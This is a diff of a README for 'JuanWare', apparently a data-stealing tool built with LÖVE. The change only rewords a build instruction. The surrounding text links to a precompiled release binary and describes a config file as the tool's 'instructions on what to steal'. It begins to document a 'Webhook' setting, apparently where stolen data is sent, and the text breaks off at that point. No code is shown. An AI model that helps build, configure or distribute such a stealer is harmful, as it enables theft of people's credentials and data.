CIA-Nano-Technologies/JuanWare/README.md

 download an already compiled [binary](https://github.com/CIA-Nano-Technologies/JuanWare/releases/latest)

-if you dont know how to, follow this [guide](https://love2d.org/wiki/Game_Distribution)
+if you dont know how to build Juan, follow this [guide](https://love2d.org/wiki/Game_Distribution)

 Config:

 This config file acts kinda like Juans instructions on what to steal, heres a short explanation on all of em:

 `Webhook`